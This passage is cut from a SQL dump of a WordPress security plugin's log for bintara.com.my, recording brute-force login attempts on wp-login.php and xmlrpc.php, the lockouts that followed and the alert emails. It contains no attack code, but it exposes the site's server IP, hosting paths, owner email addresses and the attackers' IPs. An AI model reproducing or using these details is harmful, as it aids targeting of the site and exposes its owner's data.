empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-63kXpgmG5P@iB8kL9AAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.144.17\";s:11:\"REMOTE_PORT\";s:5:\"36512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-63kXpgmG5P@iB8kL9AAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062891.5085\";s:12:\"REQUEST_TIME\";s:10:\"1569062891\";}}','notice','2019-09-21 10:48:12','2019-09-21 10:48:11',17804168,19289808,'https://bintara.com.my/2019/wp-login.php',1,0,'165.22.144.17'),(25323,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:47:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:47:14\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:02:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:02:14\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:47:15','2019-09-21 10:47:14',17881032,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'91.121.110.166'),(25324,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:47:15','2019-09-21 10:47:14',18086792,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'91.121.110.166'),(25320,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:46:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:46:43\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:01:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:01:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:46:44','2019-09-21 10:46:43',17882888,19288232,'https://bintara.com.my/blog/wp-login.php',1,0,'192.187.116.130'),(25321,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:46:44','2019-09-21 10:46:43',18088448,19288232,'https://bintara.com.my/blog/wp-login.php',1,0,'192.187.116.130'),(25322,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-sXkXpgmG5P@iB8kLmAAAAI0\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"91.121.110.166\";s:11:\"REMOTE_PORT\";s:5:\"47784\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-sXkXpgmG5P@iB8kLmAAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062833.8647\";s:12:\"REQUEST_TIME\";s:10:\"1569062833\";}}','notice','2019-09-21 10:47:15','2019-09-21 10:47:14',17796400,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'91.121.110.166'),(25318,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:46:27','2019-09-21 10:46:26',18602504,19613328,'https://bintara.com.my/test/xmlrpc.php',1,0,'34.80.222.221'),(25319,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-k3kXpgmG5P@iB8kLbQAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"192.187.116.130\";s:11:\"REMOTE_PORT\";s:5:\"42838\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-k3kXpgmG5P@iB8kLbQAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062803.1744\";s:12:\"REQUEST_TIME\";s:10:\"1569062803\";}}','notice','2019-09-21 10:46:44','2019-09-21 10:46:43',17798016,19288232,'https://bintara.com.my/blog/wp-login.php',1,0,'192.187.116.130'),(25317,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:46:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:46:26\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:01:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:01:26\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 10:46:27','2019-09-21 10:46:26',18394848,19613328,'https://bintara.com.my/test/xmlrpc.php',1,0,'34.80.222.221'),(25314,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:46:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:46:24\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:01:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:01:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:46:25','2019-09-21 10:46:24',17882968,19289072,'https://bintara.com.my/test/wp-login.php',1,0,'34.80.222.221'),(25315,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:46:25','2019-09-21 10:46:24',18088520,19289072,'https://bintara.com.my/test/wp-login.php',1,0,'34.80.222.221'),(25316,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-gXkXpgmG5P@iB8kLXgAAAIY\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"34.80.222.221\";s:11:\"REMOTE_PORT\";s:5:\"51752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-gXkXpgmG5P@iB8kLXgAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062785.7948\";s:12:\"REQUEST_TIME\";s:10:\"1569062785\";}}','notice','2019-09-21 10:46:27','2019-09-21 10:46:26',18314440,19613328,'https://bintara.com.my/test/xmlrpc.php',1,0,'34.80.222.221'),(25313,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-f3kXpgmG5P@iB8kLXQAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"34.80.222.221\";s:11:\"REMOTE_PORT\";s:5:\"51414\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-f3kXpgmG5P@iB8kLXQAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569062784.011\";s:12:\"REQUEST_TIME\";s:10:\"1569062784\";}}','notice','2019-09-21 10:46:25','2019-09-21 10:46:24',17798192,19289072,'https://bintara.com.my/test/wp-login.php',1,0,'34.80.222.221'),(25312,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-e1iJ7D9Gn7wDPh8UZQAAANM\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"43357\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-e1iJ7D9Gn7wDPh8UZQAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062779.9713\";s:12:\"REQUEST_TIME\";s:10:\"1569062779\";}}','notice','2019-09-21 10:46:21','2019-09-21 10:46:20',18314544,19611848,'https://bintara.com.my/2019/xmlrpc.php',1,0,'35.188.77.30'),(25310,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:46:15','2019-09-21 10:46:14',18088096,19288912,'https://bintara.com.my/2019/wp-login.php',1,0,'35.188.77.30'),(25311,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 